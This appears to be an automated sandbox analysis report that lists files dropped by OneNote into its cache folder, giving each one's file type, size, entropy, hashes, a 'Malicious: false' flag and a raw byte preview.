SSDEEP:	192:p9wNdtRKcVHso6zsqm06xaqZdingVzLZ7/PGSIz/yycRTbChh/JzhbEx15RGb:mdtMcVHqgAqTinMzLZ7/uSIz/yTR/mhF
MD5:	DDC3CC30794277500EFE4BC6667EC123
SHA1:	EFC9642C1F95B5FC38764476AE481649C016FA0C
SHA-256:	7F5B660A1A0BF46C75AAF19B4F77A0E086DE003EC03AFC1F58D871D55AA5BA9E
SHA-512:	25232A84604C3959634D33090238FEC8D51E40AD84EB3A08BB8522A81BE1E83378649C014E98E1DFCDF46B7BFAC92D8D2429211CD11D7EE0334C9C3DF7C1B6A6
Malicious:	false
Preview:	.PNG........IHDR...U.........1x5.....PLTE....................................e........................................................s...............x..........................o..............................................................................................................................................................~.............................m...............................................j...............................................p.......z......................................................x..............\|........................................v.......................y..........................................................h...........................................................................P..{....bKGD....H....cmPPJCmp0712....H.s...(SIDATx^.}i@S..N....h...!..)....AI%..p.L."a..)..`U..,h..:O.b.:.j+.Z).b..zN.s..{O...&\|..N}...${....~.....k}.[k}{.o^.D_..W:35ly..7rL....6n0.A...b

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008B.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.31892867204098
Encrypted:	false
SSDEEP:	48:esjwdK2xR6tQifJElLdTcX3ndj0c9FUTpy9rdMruLDmFXXppcVpu1:esAK2xR6JElBcX3x0c9WTwRMWm5Qu
MD5:	3186D72CE32C5139FF31C8D0A5517794
SHA1:	D9B16EA014A44DBFBA6457FBA4FC63A246843944
SHA-256:	3E24934E544F1063DAB10198F0D528B9EB8AD254870897F41BEF758515C167AE
SHA-512:	C135045E56D0F056D91A91663B6C78C2AEA3DBF39C357DD56B43832F0842474BEA594F2FB9CCC9F0E7FBF4AA6E8CCFC6E992A9B542F5B85A4666789E407B9734
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v...........................`.......`...4.....\..5...I.......I.qk..B.....LZ`...4.....\..5..`....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............-....Z...tQ..+....N...^.....................L...i..$O........f........................................I.qk..B.....LZ.............-....Z...tQ..+.........-....Z...tQ..+.........`.......`.......`...........................................`..j....`..T.]..`.......`....B..`..H....`....B..`....>.)`....J...................;........4...4...4.."..............`...`...`....z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........`.......`......#`..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008C.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 88 x 574, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	19920
Entropy (8bit):	7.987696084459766
Encrypted:	false
SSDEEP:	384:DRSgtAxJx7bzvAsVSqQElOT4uHmpmvNYT9aPU+QtsC2LgfIqJZnbeyRB:DsgaN7bzvAsVdK4uGQFUZ6bU/p3
MD5:	1BDAD9B3B6DE549162F9567697389E1C
SHA1:	5D9C09159F07A3A9BDCC6C4B9BD9CB72D0184E6F
SHA-256:	0908A4CFA23F93011176D47F45843E9CA2973030421996E8E27484781F54B0EC
SHA-512:	475040779AC247BB5C3E11862FB55FBDDFA12D759EE86A33E11BC1F3B656D6CD0F9B25146C0113E43E1D8001D8867D3BC3BF7E6FE21F3A0016CB1F8B70B7A15A
Malicious:	false
Preview:	.PNG........IHDR...X...>......y=h....PLTE..................................t........iw..............................................._n\|...Tds...ky......................................................p~.....................................................dr.................v.............................................n{.......ap}..........x.....z...................u......................\|..Vfu............r.....w........................................~...................Zjx...................................Yiw............w..\|....................Xgv{.....y...........................jx..............\lz.........}..z.....t..[ky........u..y.....gu................................{..........}.....u....................~...........y....r.....bKGD....H....cmPPJCmp0712....H.s...JfIDATx^...\.W./.}....Sy...(..4....D.-.....H...% .$"D.Qr.......`..;...6...N......s...^...L.....Y{.GQU`..~...j....{...-Ax.K..&.....F..I\i..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	2.9257044705369477
Encrypted:	false
SSDEEP:	48:e0sCDn8L8Lk9t2n66E1Li9NVSL6MhwrXwX9NsIpy5rdMrHHEFXC/iczizVOwNi85:e0sTL8Lk9QXE1gN0foXwX9N1ERMHkzr
MD5:	D86552A35317E949C857579B8E65C5EF
SHA1:	E1978B111BC8D88E40F8C01EE9222F2B1E0CF592
SHA-256:	750A9E18886280DFEF9518557F89EEDF66A348DE079837C184CAF7C5747DBCA2
SHA-512:	8DBD078BFA9B595668088FB6259BD6AEAF0AAA4512B340D1DB0D761B6F02864609A6CB61E4255C23A6C2DEAAEFB3026E14FBE499D36C885AAD5A7412265FA08D
Malicious:	false
Preview:	2...>...........v.......................................................................................................................................2...>.......H...v................................I.......I.qk..B.....LZ...........q..1..O.........q..1..O...........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............2..b.K.6..."Nf0....N...^..................U.8RE...T. ..........f........................................I.qk..B.....LZ.............2..b.K.6..."Nf0.........2..b.K.6..."Nf0........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008E.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	179460
Entropy (8bit):	7.979020171518325
Encrypted:	false
SSDEEP:	3072:oiKXvL7lv0am/R1vrdH+9dK6zPQ6bbnGDpcGGDNMIOIMAT8q9Vc02Q57S4A+vMFz:+vlvC/HvgA6fGqGGJlO1qZ71W6CzDn
MD5:	4E131DBFEC5C2462273CA7B35675B9D9
SHA1:	CA037F444D819A118AC37D7AA3782B9BF94C1616
SHA-256:	2A4A3530D652E227DDD5ADC096A95F6034718F7C380B07DB622022D768815059
SHA-512:	C333ECEB1439D0238BF44FB7896E62DBA4C645B70413AA0F99C1F10E8DCD20C2EEE5C83F2E9DDE9A2494C85A6D8D13CFFFC4160E2F598E17867015F5244D656A
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1AQ.aq...".....2Rr..Bb..#34.....CSs.$5c.t....%.Dd.6.T..u.U....E.7w........................!.1A.Qaq......2."r.3....BRb.#4......CsSc...$.5..%.DT.t67d..Uu...'............?..c.......p..z..i.....z......kj........F>f......3N...M....RM.&..-.~.Q..'.....q.a..w...-~......g.{..&.......V.n.D....>FS!n.....@..)...W..q..Wr{..J.gf.{.M$.P@m.,..9..&m.D...w.._...-.O........s.....h.k~......(.K...V..l.-...+.9.k............#.p#.O..9M..mF...C.......7+.AI....4vw.;..H......e..Q.u[.eUK.....z.....[.Kt...s..Lf.4..l{.....sh.............=..;..iqkj.m.a...NH......v..H..$..q.y......c...U[Mcf.......+...S-...^....4..T..YtL.x.v.;.....<...Ik\|B.$.s8......3.+.8.l.. h.:....%B..W..I.QRS..,x.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.344952222346411
Encrypted:	false
SSDEEP:	48:eBsycP8S8933A8dtLmofE41cpX3p9RsjpyxrdMrXLoWqFXrDKbMFPcAaUg:eBs58x3A8d5fEDpX3p9RKsRM7oWq9oU
MD5:	587DD300CD71A6A26CBBFF6D92B472D0
SHA1:	8142E689A6C8F2AA88B31F7882D01E71E2E36D97
SHA-256:	3C7E37773A2A796FA804F9AB72C1ECC755992CD46722F2229C6B6D3F57ED2179
SHA-512:	8ECDFF89DF5DC2758034DF699C9FD6035E5D7E4E077BE8779B0BCFF5250CB615F882E17556CAB37FB12F513F0D4D8EFC5D20C4A9F5679F532059BDEE358E2434
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZ.4k......4k(....8....\|...4k(....8....\|...4k..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............L....x.)b.a.......N...^................1....DK......\.........f........................................I.qk..B.....LZ.............L....x.)b.a............L....x.)b.a.............4k......4k......4k..........................................4kj.....4kT.]...4k......4k..B...4kH.....4k..B...4k..>.).4k..J...................;........4...4...4.."...............4k..4k..4k..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........4k......4k....#.4k............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008G.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	109698
Entropy (8bit):	7.954100577911302
Encrypted:	false
SSDEEP:	3072:rDlmvIWr0aRtNCfShCWBxyCHMlcVG0Ezy4FR:rDliIfot8ahCWBcCHDVwR
MD5:	8D804A60E86627383BED6280ED62F1CF
SHA1:	E23FF14B10AD0762DD67FBA3CD6EFC85647C0384
SHA-256:	494547E566FB7A63DD429EB0699FE41AA8998F8EA2F758D813FE3D56C3075719
SHA-512:	0FB19F3D00159F2748C3A54E952E551B9FEA6910D67A54DECA8D099992E50383EADB92768FF1F75CFFAE82A7A157B1E0F77A2F0BE7EC64FD2324304FDCA46577
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...............................................................................................!"#.123..AQB$..aq.RCS...b..c4%..rs..D&....5E6'..TdUte...u.....FV...7.......................!"..1A2B..QaqR.#.br3.........C%...$5.....c4U..Eeu&SsD.6T..................?.....O.C.....^..R<A.g...[....3.....r.0.....nX.S....}...[.?Z.....A.?..~~I..rY\|N.o...9......!...o7r../-.y...'5.3.U.s".-.0.1......SS...&.Q.j.*.$m.e..:x....`}...EP.?.7..~G(so.......O.....z.N..<....~^a.e...........p9.?<._..\|......~.<@.D.9..G..?.?z.y?z.C.U.w..[.,..A.+........s......g...G.^....pz.xY.....d8.y.X...P..O(A.O..~:._.......<...o..4s..^.^b..x......_a.....\|{c...:..X.....}.._...[?..NK.c...}.<......H.G....+x.Z..\|....n...o....`.nk.#.%x......-\|...\|7......N!=././..w.8x.".8....'x........w...,>....j[w8a..}..lS..?.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008H.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.308297892786496
Encrypted:	false
SSDEEP:	48:GsFSN5Y23jtvhnE3ymxXVbF91u8sDpyxrdMrpnt5J2FXf9mrpyJ:Gsy53j7EtXj91bKURM+Oty
MD5:	D40FEBC699C4B1E76E11F94225587BB8
SHA1:	FDC8FC1762528AF52A8EA669651CF8B0BD7F2FBB
SHA-256:	C8067C939EEB0DF9781FB884527C8E21C5090404767888298C623F0E26977632
SHA-512:	D3256C0A92B66FDE5E74C038FA34301A9FD4953071BBA0F1D9ABB448BF90E278C69A2093C2B212D024FBE017C02871F19E99474C2AF2285185531F0F12FEEEF6
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ. 8...... 8.e$U.4.m..<.q. 8.e$U.4.m..<.q. 8..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............[.1..Y..=... .40....N...^...............v=.D..0A.v..............f........................................I.qk..B.....LZ............[.1..Y..=... .40........[.1..Y..=... .40.......... 8...... 8...... 8.......................................... 8j..... 8T.]... 8...... 8..B... 8H..... 8..B... 8..>.). 8..J...................;........4...4...4.."............... 8.. 8.. 8..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.......... 8...... 8....#. 8............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008I.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	41893
Entropy (8bit):	7.52654558351485
Encrypted:	false
SSDEEP:	768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
MD5:	F25427EFECFEE786D5A9F630726DD140
SHA1:	BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
SHA-256:	5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
SHA-512:	B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[Fly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.387317393700972
Encrypted:	false
SSDEEP:	48:1qAL/A5SOBy8jnXEDbPUErl7D/OpLqGLxLZLxsLmLcLwDL:1ql8OLbEDb8Edmt1l9qW8wv
MD5:	773413C46B82167C37FCA6A78D900512
SHA1:	DC80C6D681653ECD142CEB3F635FE989E8AB71E1
SHA-256:	6B4FF9CBBAB63293EE71D057B3BC544DE4B7C49361883966175CD3E2C26DCC4B
SHA-512:	FE3A01559C05505D8BB042655C38D7CF6DC299801DA0F64F212975991E6E7E0C3D654EF06F91A710AC7FCEC0192753B3E24A8AC5C687E70E359052368B5968EB
Malicious:	false
Preview:	........0.......................................................?...............................................................................................h.......................................t.".....t."\|W.J..S.4ZYY..e.......e.."5.............."z.v.........e.."5.......K..e..+....F....9..+.....................................................................t."T&h......{....X........4.............$..i..T(T...+.T.9................4..(.....x.(.....E<......E<.^W.S./.b.~l..+.......+....F....9..2.......v.......4...............t."...e.E<...........................+........e..c..,0...e...B4.$........[.-...I.......9......................E<.^W.S./.b.~l.E<..X}`d........p..NX}`..+....F....9..+......>.......@.........e.."5.......K.+....F....9.............................."z.v.....+.......+....F....9.......t.".....E<...c..,0...e...B4.$..............E........................................0...........e....4..................T.o. .D.o. .L.i.s.t........s.)..O@

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008K.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.9217341231600966
Encrypted:	false
SSDEEP:	192:yu5sY+pFTi29KfV9YOk6ck2kwsoYwnVX0jTgMec9RzkxtPGyd9my+X:qY+pvo7uPWBV9Rztyd9my+X
MD5:	E17B359CEB395547D8220F7524914B78
SHA1:	FAEEACF3BE05046364576B81BA9BD0A072ABABE8
SHA-256:	3FE364B06A36B31EA4D95B3ACAAD90B9DD3AF117DEC937AB1CE5330988EF2605
SHA-512:	432D5665607A09C806B34853D46FD33BC3F600AAE163C7A7E84EFB4A5363DDC0CC2C80DE469111AF06B5BB4ADEEBEE8D82CB73983495C30E19497AE61AC25951
Malicious:	false
Preview:	2...>...........v........ .. "..2...>...d...<...v.......@....!...........................................................................................................................................I.......I.qk..B.....LZ=&C.;...=&C.i...3.&-cT.q=&C.i...3.&-cT.q=&C..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............e.....#.W/...h....N...^................D<..B:F... @.N.............(...............................D....I.qk..B.....LZ..............e.....#.W/...h.................................=&C.....=&C.....=&C.........................................=&Cj....=&CT&~..=&C.....=&C..g..=&CH....=&C .)..=&C$....=&C..u...................;........4...4...4.................=&C-=&C.=&C..z...y.. x.. ...........$........2..72..7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.1.6..........(=&C#=&C8=&C..z...,4. .......$>........4...4

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
Category:	dropped
Size (bytes):	68633
Entropy (8bit):	7.709776384921022
Encrypted:	false
SSDEEP:	1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
MD5:	41241EE59AB7BC9EB34784E3BCE31CB4
SHA1:	98680761A51E9199CF3C89F68B5309FBEC7EE3CB
SHA-256:	035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
SHA-512:	3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008M.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	4.065842515306395
Encrypted:	false
SSDEEP:	192:WfvzFp0BN/nW5lpYzewmMOpn36r7/g6ryX0JwqRJGtBWqybyT3gq94iKkU3ZBNeE:ep0L/gcGERJwT6Y4CC7t
MD5:	8848FF9165B876F837177E2ED8A69F42
SHA1:	C990809274872DA438B205D92C5B9368D70BD881
SHA-256:	747A27CCEA14FDD8AEAAE2A752D2C4C699A07180FCFB86FC6E6D160EB5D206C1
SHA-512:	6565F44ED492A995575B27BDB16C06A39B1302A4902B1B88034B22F22EFE38B74886ECDB1DB07A7361043F986F369D914D33B72C09E676D6C7CF669CCA1B26E2
Malicious:	false
Preview:	....>.......,...D.......x ..`9......>.......\|...D...H...@....:...........................................................................................................................................I.......I.qk..B.....LZ............{...2.b.\|f....;.m...)..9.zA..;.....{...2.b.\|f.......I.qk..B.....LZ.I.............;.......;.......;...........................................;j......;T.t....;.......;..N....;H......;..5....;..F.%..;..................;........4...4...4...............;:..;L..;..z...y.. x.. ...........$........2..72..7........o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.5............'..;%..;9..;..z...,4. .......$>........4.@.4..`..7.....................D..n4..o4..p4...4. ..1.........;......;....%..;#...'..;&...2..;....9..;....:..;$......;........'..;%..;..;..z...,4. .......$>........4.@.4..`..7.....................D..n4..o4..p4...4. .F.+............................;........4...4...4...3...................;:..;...;..z...y.. x.. ...........$........2..72..7.....*

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
Category:	dropped
Size (bytes):	59832
Entropy (8bit):	7.308211468398169
Encrypted:	false
SSDEEP:	1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
MD5:	DCDD543A4E0BA2C1909BA095D46FFBCB
SHA1:	B86C89537138FE07255354202D3EAD0B53B3C54D
SHA-256:	28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
SHA-512:	5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
Malicious:	false
Preview:	......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008O.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.815649718329845
Encrypted:	false
SSDEEP:	192:JsWGxkrr5QAyf9AqNRXZVvV6UpRXauzERJdskKCUSrma98Uj9ZdmeDAiE9pg54W7:uTtNRXz9v7DERJ4CUomi8URWGAiOWKC9
MD5:	2D521EDF795B79FACD476B2D379E70AE
SHA1:	910F3646E7DF637B50C1DA1102200F7BD3C09E5E
SHA-256:	CBB8603C3B7427C746F8896BA8A20CA801D743BA379DD520462CF8C74BAD9235
SHA-512:	CDC6F2C5D6BE2DF5D302B1467C1CEDEF3676AD67CD5BF2CA989A69395720E7692782DA833404BF94E264082849820583FBF270AC852FC659FF1DA3DBFE4891B5
Malicious:	false
Preview:	2...>...v.......v....... ..X-..2...>...2.......v.......@...H,...........................................................................................................................................I.......I.qk..B.....LZ..].P.....]..........ce-..]..........ce-..]..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............g..X.... .K.K......N...^................Cq..-.E....}..`.................................................I.qk..B......LZ............g..X.... .K.K.....................................].......].......]...........................................]j......]T......]..o....].......]..O....]..s....]$.A.$..]$.................;........4...4...4...............]3..]X..]..z...y.. x.. ...........$........2..72..7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.9...............]3..]z..]..z...y.. x.. ...........$........2..72.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008P.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	53259
Entropy (8bit):	7.651662052139301
Encrypted:	false
SSDEEP:	768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
MD5:	2EE369ABB7936F8C28FF0ABDD224EA05
SHA1:	FE9D304A7B49E31EAE439369ABC548E265149636
SHA-256:	FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
SHA-512:	5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}..a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{\|>..MN=:....Q[..H....a........\|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u....p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\header

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Matlab v4 mat-file (little endian) \350\001, numeric, rows 1051426662, columns 0
Category:	dropped
Size (bytes):	72
Entropy (8bit):	2.362554355114149
Encrypted:	false
SSDEEP:	3:PtlSUHA8IM/3aaRj/aRatl:PtBA8Lq8+8X
MD5:	C9F340EE8250A4F3E9D450866B7E8FFD
SHA1:	94397F6E759AF305810087B9BF98699D0A1BCEA2
SHA-256:	0BB98D54D3039A61229880CC4638D5545189EE7D5D6694ABFA0192A99B50435C
SHA-512:	839AAE0158BE4E56F2277A750E221A608450C73F17B941DA359B9CFFB746CA05B5F37E5B037FA06F6F9B5B582E01FC8FD192BB60A5330ADD74AC6648AE09B6DF
Malicious:	false
Preview:	....f..>.................................................:..............

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000001.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	386 compact demand paged pure executable not stripped
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.312943005139063
Encrypted:	false
SSDEEP:	384:JciQQrDXsgME7mPKRtdBDGi4KF/od8Uq5PbJ2hnEnK/V0QvP9MoIB:eiZeKRdyiZoC5PUhnEKPIB
MD5:	94DB817E39E9153620FF932CFF98449E
SHA1:	E17AAE01E16BB51F378E959CB080A941BB26B992
SHA-256:	11CFC794D2869849F9D7CD9C6261AB5B20F48D2FE64503B1B03AEE257F2806C6
SHA-512:	23BBE295DA3ADD68E6531BC4DFF1552BD063A6A4DCCFA69D83BA6B5498C823CAEEE802CC4356AF6FD1F34A6D38341A89A93EDEDE94B3DB725B32A277FE3A1E2E
Malicious:	false
Preview:	................................0.......H...-...........................?..~.............................................................................................?...........4@..B&. . ........s.....K.Z.G.A..........P....&...H....K.s.....K.Z.G.A...........4...V8O.<.!............s.....K.Z.G.A...........G...Le...........z.......?.....................??.~.............................................................................................?..................R.ox..J.%..-.......D..N{I....2..~.....A... L..HJ......]l......aw..{.M.....4..ByK.R.ox..J.%..-......B....6.H.;..3....y}m.........9..."F.B...7N0.....$.Jp.Ks..)r..5..Z.]..D..N{I....2..~....i.....#....m......."..@....r...._..R'WD..X.5'K......Op.b..F.$..i.................................F....Q...[.d.........v.vT4...I$...A................0......@..K.I.H.]yY.i.......Op.b..F.$..i..........E:..@H......@...........@...@.Op.b..F.$..i........Op.b..F.$..i..............@.....r.....z...E..g..........Un.w.........V{...u.4\

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000002.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	SysEx File -
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	5.102849306573264
Encrypted:	false
SSDEEP:	96:g578zUrbjMp5O+WeratORWtzHlWj2E37EvLRWLHDInGrmk9q7z6DHEkf:g+zUrbjZvaVItr7ILHM6Ny
MD5:	591EE8A376C129F76EF91B9DC5F108B8
SHA1:	AD6DDFE2328E14990E8EF32F8F7D30E345773928
SHA-256:	526A0D759F29EF031264015054BB03607A1CC2FA5159ADA53E9479759703ACC8
SHA-512:	AC95ADD35D622360424CB079B6026D09742C5FD63A86A1908DB9D5EA4BA724ABD5E19CD955E6946322F7ABCCECA27D168DBC843B416008923AA9CEAA396270BC
Malicious:	false
